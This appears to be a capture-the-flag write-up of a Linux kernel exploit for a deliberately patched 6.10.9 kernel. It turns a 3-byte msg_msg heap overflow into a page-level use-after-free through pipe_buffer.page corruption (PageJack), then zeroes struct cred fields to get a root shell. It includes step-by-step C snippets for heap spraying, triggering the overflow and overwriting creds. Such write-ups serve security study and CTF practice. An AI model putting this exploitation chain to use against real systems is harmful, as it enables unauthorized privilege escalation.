TL;DR
A 3-byte heap OOB write in msgsnd() is leveraged into a page-level UAF and then into root via a struct cred overwrite (PageJack).
Description: i love sending messages, so i made it possible to add just a few more bytes to them
Vulnerability
A custom Linux 6.10.9 kernel ships with the following patch in ipc/msgutil.c:
@@ -93,7 +93,7 @@
return ERR_PTR(-ENOMEM);
alen = min(len, DATALEN_MSG);
- if (copy_from_user(msg + 1, src, alen))
+ if (copy_from_user(msg + 1, src, alen + 3))
goto out_err;
load_msg(), invoked by msgsnd(), copies alen + 3 bytes from userland into a freshly allocated msg_msg slab object, so three bytes are written past the end of the allocation. Depending on how much padding the slab slot leaves after the object, between zero and three of those bytes reach the next object in the same slab. The allocation size (via msgsz) and the three overflow bytes (mtext[msgsz], mtext[msgsz+1], mtext[msgsz+2] of the user buffer) are both attacker-controlled.
Relevant kernel configuration:
- CONFIG_RANDSTRUCT_NONE=y (no field reordering on kernel structs)
- HARDENED_USERCOPY, INIT_ON_ALLOC, INIT_ON_FREE, RANDOM_KMALLOC_CACHES are disabled
- KASLR / SMAP / SMEP / KPTI are enabled but irrelevant (the exploit requires no infoleak)
Object collision in kmalloc-cg-1k
struct msg_msg has a 48-byte header followed by the payload:
struct msg_msg {
    struct list_head m_list;    // 16 B
    long m_type;                // 8 B
    size_t m_ts;                // 8 B
    struct msg_msgseg *next;    // 8 B
    void *security;             // 8 B
    /* payload */
};
msgsnd() allocates kmalloc(48 + msgsz, GFP_KERNEL_ACCOUNT). The _ACCOUNT flag routes the allocation into the kmalloc-cg-* accounted caches.
A pipe is backed by a ring of 16 pipe_buffer structs allocated as a single array:
struct pipe_buffer {
    struct page *page;                      // offset 0
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};  // sizeof = 40 B
The ring is 16 * 40 = 640 bytes, allocated via kcalloc(..., GFP_KERNEL_ACCOUNT). Both pipe_buffer[16] (640 → 1024) and msg_msg with msgsz = 974 (48 + 974 = 1022 → 1024) land in kmalloc-cg-1k. Choosing msgsz = 974 places the overflowing msg_msg next to a pipe_buffer[16] and the 3-byte overflow lands on the first field of that array, pipe_buffer[0].page.
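The size-class arithmetic can be checked with a small user-space model. This is only a sketch: it assumes the default x86_64 kmalloc size classes (8 through 8192, including the 96 and 192 byte caches) rather than reading them from the target kernel, and kmalloc_slot_size and msg_msg_alloc_size are hypothetical helper names, not kernel functions.

```c
#include <stddef.h>

/* Assumed default kmalloc size classes on x86_64 (not read from the target). */
static const size_t kmalloc_classes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Hypothetical helper: smallest size class that fits `req` bytes, 0 if none. */
size_t kmalloc_slot_size(size_t req)
{
    size_t n = sizeof(kmalloc_classes) / sizeof(kmalloc_classes[0]);
    for (size_t i = 0; i < n; i++)
        if (req <= kmalloc_classes[i])
            return kmalloc_classes[i];
    return 0;
}

/* Request size for a single-segment msg_msg: 48-byte header plus payload. */
size_t msg_msg_alloc_size(size_t msgsz)
{
    return 48 + msgsz;
}
```

Under these assumptions, kmalloc_slot_size(16 * 40) and kmalloc_slot_size(msg_msg_alloc_size(974)) resolve to the same 1024-byte class, which is the collision the exploit relies on.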
PageJack primitive
The kernel maintains a struct page descriptor for every physical page, in a flat array (the vmemmap) located around 0xffffea0000000000 on x86_64:
PFN N → vmemmap[N] @ 0xffffea0000000000 + N * 0x40
Since sizeof(struct page) == 0x40, every valid struct page * has one of {0x00, 0x40, 0x80, 0xC0} as its low byte. Overwriting that low byte with 0x40 yields:
| original LSB | net shift | target |
|---|---|---|
| 0x00 | +0x40 | PFN + 1 |
| 0x40 | 0 | no-op |
| 0x80 | -0x40 | PFN - 1 |
| 0xC0 | -0x80 | PFN - 2 |
In three cases out of four, pipe_buffer.page is shifted to a different struct page, which describes a different physical page. No PTE is involved; the corruption is purely in the kernel pointer that is later dereferenced for pipe I/O.
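The shift table can be reproduced with plain pointer arithmetic. The sketch below assumes the vmemmap base and the 0x40-byte struct page size quoted above; pfn_to_page, overwrite_lsb and pfn_shift are illustrative names, not kernel APIs.

```c
#include <stdint.h>

#define VMEMMAP_BASE     0xffffea0000000000ULL /* base quoted in the text */
#define PAGE_STRUCT_SIZE 0x40ULL               /* sizeof(struct page) */

/* Address of the struct page describing physical frame `pfn`. */
uint64_t pfn_to_page(uint64_t pfn)
{
    return VMEMMAP_BASE + pfn * PAGE_STRUCT_SIZE;
}

/* Model of the 1-byte corruption: replace the low byte of a pointer. */
uint64_t overwrite_lsb(uint64_t ptr, uint8_t lsb)
{
    return (ptr & ~0xffULL) | lsb;
}

/* Signed PFN delta between the corrupted and the original struct page *. */
int64_t pfn_shift(uint64_t pfn, uint8_t lsb)
{
    uint64_t before = pfn_to_page(pfn);
    uint64_t after = overwrite_lsb(before, lsb);
    return (int64_t)(after - before) / (int64_t)PAGE_STRUCT_SIZE;
}
```

With lsb = 0x40, four consecutive PFNs starting at a multiple of 4 give shifts of +1, 0, -1 and -2, matching the table row by row.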
Pipe append semantics and the marker design
When write() is called on a pipe whose last buffer has PIPE_BUF_FLAG_CAN_MERGE set and len > 0, the kernel appends data at page + buf->offset + buf->len and increments len. The destination offset on the page is fully determined by the buffer’s offset and len fields.
Reading from a pipe consumes data and invokes pipe_buf_release (which calls put_page) only when the buffer becomes empty. A read that leaves len > 0 advances offset but does not release the buffer.
The exploit uses an 8-byte marker per pipe: two consecutive 4-byte writes that merge into a single pipe_buffer[0] with offset=0, len=8. The detection scan then reads 4 bytes per pipe, leaving each touched buffer at (offset=4, len=4). Two consequences:
- pipe_buf_release is never called during the scan, so the underlying page is not freed prematurely.
- After the scan, offset + len == 8 regardless of read order. The final write, which appends at that location, will land at offset 8 of the page.
Offset 8 of the first slot on a cred_jar page is the offset of cred.uid.
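The invariant is easy to replay in a toy model. The sketch below tracks only the offset and len fields of one pipe_buffer; struct buf_model and the model_* functions are made up for illustration and do not reflect the kernel's pipe code beyond the append and consume rules described above.

```c
/* Toy model of the two pipe_buffer fields that matter here. */
struct buf_model {
    unsigned int offset;
    unsigned int len;
};

/* Merging write: data is appended at offset + len.
 * Returns the page offset where the first written byte lands. */
unsigned int model_write(struct buf_model *b, unsigned int n)
{
    unsigned int dst = b->offset + b->len;
    b->len += n;
    return dst;
}

/* Read: consumes up to n bytes. Returns 1 if the buffer became empty
 * (the point where the kernel would release the page), else 0. */
int model_read(struct buf_model *b, unsigned int n)
{
    if (n > b->len)
        n = b->len;
    b->offset += n;
    b->len -= n;
    return b->len == 0;
}

/* Replays the marker protocol for one pipe and returns the page offset
 * of the final write. `scanned` says whether the detection loop read
 * 4 bytes from this pipe. */
unsigned int final_write_offset(int scanned)
{
    struct buf_model b = {0, 0};
    model_write(&b, 4);
    model_write(&b, 4);
    if (scanned)
        model_read(&b, 4);
    return model_write(&b, 28);
}
```

Both final_write_offset(0) and final_write_offset(1) land at 8, which is why the marker is written as two 4-byte halves and read back as one.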
cred_jar and the buddy allocator
struct cred is allocated from a dedicated slab cache (cred_jar). Slab caches are isolated at the slab layer, but they all pull backing pages from the same buddy allocator. A page returned to buddy by kmalloc-cg-1k can be reissued to cred_jar on its next refill.
The relevant fields of struct cred on Linux 6.10 (include/linux/cred.h):
0..8 atomic_long_t usage <- refcount
8..12 kuid_t uid
12..16 kgid_t gid
16..20 kuid_t suid
20..24 kgid_t sgid
24..28 kuid_t euid
28..32 kgid_t egid
32..36 kuid_t fsuid
36..40 kgid_t fsgid
Zeroing bytes 8..36 sets uid through fsuid to 0 while leaving usage intact. With cred_jar slot size of 192 B, a single 4 KiB page hosts ~21 cred slots.
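The offsets can be sanity-checked with a user-space mirror of the struct's first fields. This is a sketch under the assumption of an LP64 target (8-byte atomic_long_t, 4-byte kuid_t and kgid_t); struct cred_prefix is not the kernel definition, and field_covered is a hypothetical helper.

```c
#include <stddef.h>
#include <stdint.h>

/* Mirror of the leading fields of struct cred as listed above (assumed LP64). */
struct cred_prefix {
    uint64_t usage;
    uint32_t uid, gid, suid, sgid, euid, egid, fsuid, fsgid;
};

#define CRED_SLOT_SIZE 192u  /* cred_jar slot size quoted in the text */
#define PAGE_SIZE_4K   4096u

/* Whole cred slots that fit in one 4 KiB page. */
unsigned int cred_slots_per_page(void)
{
    return PAGE_SIZE_4K / CRED_SLOT_SIZE;
}

/* 1 if the field at [off, off + size) lies entirely inside [start, end). */
int field_covered(size_t off, size_t size, size_t start, size_t end)
{
    return off >= start && off + size <= end;
}
```

Checking field_covered over the range [8, 36) confirms that fsuid is the last field zeroed, while usage and fsgid stay untouched.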
Draining cred_jar
To force cred_jar to refill from buddy, the freelist must be emptied. A setuid() loop is the standard mechanism: each call invokes
new = prepare_creds(); // ALLOCATES a fresh cred from cred_jar
new->uid = ...;
commit_creds(new); // current->cred = new; OLD cred returns via RCU
Allocations are immediate; the freeing of the previous cred is RCU-deferred. In a tight loop, the freelist drains faster than RCU returns freed creds to it, and once it is empty the next prepare_creds() triggers a buddy request. On this kernel, ~128 iterations is sufficient. A larger drain is counter-productive: the longer the UAF page sits in buddy, the higher the chance another allocator consumes it first.
Exploitation
Setup: pin the process to a single CPU (stabilizes per-CPU slab partial lists) and raise RLIMIT_NOFILE (each pipe consumes two FDs).
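The setup code is not shown in this writeup, so the following is a sketch of one way to do it with standard Linux calls. Pinning to whichever CPU the process is already running on is an assumption (any fixed CPU would do), and pin_to_current_cpu and raise_nofile_limit are hypothetical helper names.

```c
#define _GNU_SOURCE
#include <sched.h>
#include <sys/resource.h>

/* Pin the calling thread to the CPU it is currently running on.
 * Returns 0 on success, -1 on error. */
int pin_to_current_cpu(void)
{
    int cpu = sched_getcpu();
    if (cpu < 0)
        return -1;
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    return sched_setaffinity(0, sizeof(set), &set);
}

/* Raise the soft RLIMIT_NOFILE to at least `wanted`, capped at the hard
 * limit. Returns 0 if the soft limit is >= wanted afterwards, else -1. */
int raise_nofile_limit(rlim_t wanted)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_NOFILE, &rl) != 0)
        return -1;
    if (rl.rlim_cur >= wanted)
        return 0;
    rl.rlim_cur = wanted < rl.rlim_max ? wanted : rl.rlim_max;
    if (setrlimit(RLIMIT_NOFILE, &rl) != 0)
        return -1;
    return rl.rlim_cur >= wanted ? 0 : -1;
}
```

With 384 pipes the spray needs 768 descriptors on top of the standard ones, so a call such as raise_nofile_limit(1024) would leave some headroom.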
Step 1: spray pipes
for (int i = 0; i < 384; i++) pipe(pipes[i]);
Each pipe() allocates a pipe_buffer[16] array into kmalloc-cg-1k.
Step 2: write markers
for (int i = 0; i < 384; i++) {
    write(pipes[i][1], &i, 4);
    write(pipes[i][1], &i, 4);
}
The second write merges with the first via CAN_MERGE; the buffer ends at offset=0, len=8 with the marker [i, i] written to its page.
Step 3: free 22 holes
free_special_pipes(48, 304); // close i where i % 12 == 0
There are 22 multiples of 12 in [48, 304], and each freed pipe is surrounded by surviving pipes. A more aggressive step (e.g. 1-in-2) would allow two adjacent slots to both be reclaimed by msg_msgs, causing the overflow to clobber another msg_msg rather than a pipe_buffer.
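The body of free_special_pipes is not shown here. A possible reconstruction, assuming an inclusive [lo, hi] range and taking the step as an explicit parameter, could look like the sketch below; count_holes and free_special_pipes_step are hypothetical names.

```c
#include <unistd.h>

/* Number of indices in [lo, hi] that are multiples of `step`. */
int count_holes(int lo, int hi, int step)
{
    int holes = 0;
    for (int i = lo; i <= hi; i++)
        if (i % step == 0)
            holes++;
    return holes;
}

/* Close both ends of every pipe whose index in [lo, hi] is a multiple of
 * `step`, mark it with -1 so later loops skip it, and return how many
 * pipes were freed. */
int free_special_pipes_step(int (*pipes)[2], int lo, int hi, int step)
{
    int holes = 0;
    for (int i = lo; i <= hi; i++) {
        if (i % step != 0)
            continue;
        if (pipes[i][0] >= 0)
            close(pipes[i][0]);
        if (pipes[i][1] >= 0)
            close(pipes[i][1]);
        pipes[i][0] = pipes[i][1] = -1;
        holes++;
    }
    return holes;
}
```

count_holes(48, 304, 12) gives the 22 holes mentioned above. Marking closed pipes with -1 matches the pipes[val][0] != -1 check used later in the detection loop.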
Step 4: trigger the overflow
m.mtype = 1;
memset(m.mtext, 0x41, 974);
m.mtext[976] = 0x40;
for (int q = 0; q < 24; q++) msgsnd(qids[q], &m, 974, 0);
msgsz = 974 → kmalloc(1022) → 1024-byte slot. copy_from_user writes 977 bytes starting at slot offset 48; mtext[974] and mtext[975] fall into the slot’s tail padding (object 1022 B, slot 1024 B); only mtext[976] reaches byte 0 of the neighboring slot, the LSB of pipe_buffer[0].page.
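The byte accounting can be written down as two small helpers. This is a sketch with made-up names (bytes_into_next_slot, mtext_index_for_next_slot_byte); it uses the 48-byte header and the 3 extra bytes given above and takes the slot size as a parameter.

```c
#include <stddef.h>

#define MSG_HDR   48u  /* sizeof(struct msg_msg) as given above */
#define OOB_EXTRA 3u   /* extra bytes copied by the patched load_msg() */

/* Number of bytes that land in the neighbouring slot when a message of
 * `msgsz` bytes is stored in a slot of `slot` bytes. */
size_t bytes_into_next_slot(size_t msgsz, size_t slot)
{
    size_t end = MSG_HDR + msgsz + OOB_EXTRA; /* one past the last byte */
    return end > slot ? end - slot : 0;
}

/* Index into mtext of the byte that lands at offset `k` of the next slot. */
size_t mtext_index_for_next_slot_byte(size_t slot, size_t k)
{
    return slot - MSG_HDR + k;
}
```

For a 1024-byte slot, msgsz = 974 spills exactly one byte, and that byte is mtext[976], which is why only that index is set to 0x40.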

Step 5: locate the overlap
for (int i = 0; i < 384; i++) {
    int val;
    if (read(pipes[i][0], &val, 4) != 4) continue;
    if (val != i && val >= 0 && val < 384 && pipes[val][0] != -1) {
        a = i;   // corrupted pipe
        b = val; // page's legitimate owner
        break;
    }
}
A pipe whose first 4 bytes do not match its index has had bufs[0].page shifted to another pipe’s page; the read returns that other pipe’s marker. Each read consumes 4 of 8 bytes, so the page is not released. pipes[a] and pipes[b] both reference the shared page on exit.
![Figure 2: pipe[a] and pipe[b] both reference the same struct page](/images/messenger/figure_2_overlap.png)
Step 6: free the shared page
close(pipes[a][0]); close(pipes[a][1]);
pipe_release calls put_page on the shifted pointer. The refcount goes 1 → 0, the page returns to buddy. pipes[b] still holds a stale .page pointing at it: page-level UAF.
![Figure 3: close(pipe[a]) returns the shared page to buddy](/images/messenger/figure_3_uaf.png)
Step 7: drain cred_jar and fork
for (int i = 0; i < 128; i++) setuid(1000);
if (fork() == 0) fork_n_win(320);
After 128 setuid() calls, cred_jar requests a page from buddy on the next prepare_creds(). The 320 subsequent fork() calls each allocate a cred via copy_creds(); with ~21 slots per page, several land in the hijacked page.
Step 8: overwrite cred IDs
static char zeros[4096] = {0};
write(pipes[b][1], zeros, 0x18 + 4); // 28 bytes
pipe_write appends to pipes[b].bufs[0] at page + offset + len. Two cases:
- if b > a: pipes[b] was not read during the scan; buffer is at (0, 8).
- if b < a: pipes[b] was read once during the scan; buffer is at (4, 4).
offset + len == 8 in both cases. The 28 zero bytes cover page offsets 8..36, i.e. uid + gid + suid + sgid + euid + egid + fsuid of the first cred slot on the page. usage (0..8) is preserved.
![Figure 4: cred_jar reclaims the page; write through pipe[b] zeroes uid..fsuid](/images/messenger/figure_4_overwrite.png)
Step 9: trigger the shell
Each forked child polls getuid() and execs /bin/sh once it reads 0. The parent must not exit; closing pipes[b] would call put_page on a cred_jar page and oops the kernel.
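The child loop is not shown here. A minimal sketch is given below, assuming a bounded number of polls so that children whose cred was not hit eventually exit (the description above does not state a bound); wait_for_root and child_main are hypothetical names.

```c
#define _DEFAULT_SOURCE
#include <stddef.h>
#include <unistd.h>

/* Poll getuid() up to `tries` times, sleeping `delay_us` microseconds
 * between attempts. Returns 1 as soon as uid 0 is observed, else 0. */
int wait_for_root(int tries, unsigned int delay_us)
{
    for (int i = 0; i < tries; i++) {
        if (getuid() == 0)
            return 1;
        usleep(delay_us);
    }
    return 0;
}

/* Child body: exec a shell once this process's cred has been zeroed,
 * otherwise give up and exit without running atexit handlers. */
void child_main(int tries, unsigned int delay_us)
{
    if (wait_for_root(tries, delay_us))
        execl("/bin/sh", "sh", (char *)NULL);
    _exit(1);
}
```

getuid() is a real syscall on every call, so a child sees the change as soon as the write through pipes[b] has zeroed its cred.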
[+] uid=0 gid=0 euid=0 egid=0 pid=239
lactf{not_the_real_thing}
Tuning rationale
| Parameter | Value | Reason |
|---|---|---|
| msgsz | 974 | 48 + 974 = 1022 rounds to 1024, landing in kmalloc-cg-1k. A payload above 976 bytes moves to kmalloc-cg-2k and misses every pipe_buffer. |
| OOB byte | 0x40 | Maintains 0x40 alignment of struct page *. A value that is not a multiple of 0x40 yields a misaligned pointer that does not reference a valid struct page. |
| Free step | 12 | Ensures each freed slot is bordered by surviving pipes, so every overflow hits a pipe_buffer. |
| Marker layout | 2×4 B write, 4 B read | Keeps the buffer alive after the scan and places the next write at page offset 8 regardless of (a, b) ordering. |
| Drain | 128 | Empties cred_jar’s freelist without leaving the UAF page exposed to other allocators for an extended period. |
| Closing pipes[b] | never | Releasing it would call put_page on a page now owned by cred_jar. |
References
- Original writeup by Shunt (idek team): https://idek.team/blog/oob-write-to-page-uaf-lactf-2025/
- PageJack, Black Hat USA 2024 by Qian: https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf
- Reviving exploits against cred_struct, by willsroot: https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html
- CVE-2022-0995 (pipe_buffer.page bit set): similar technique with watch_queue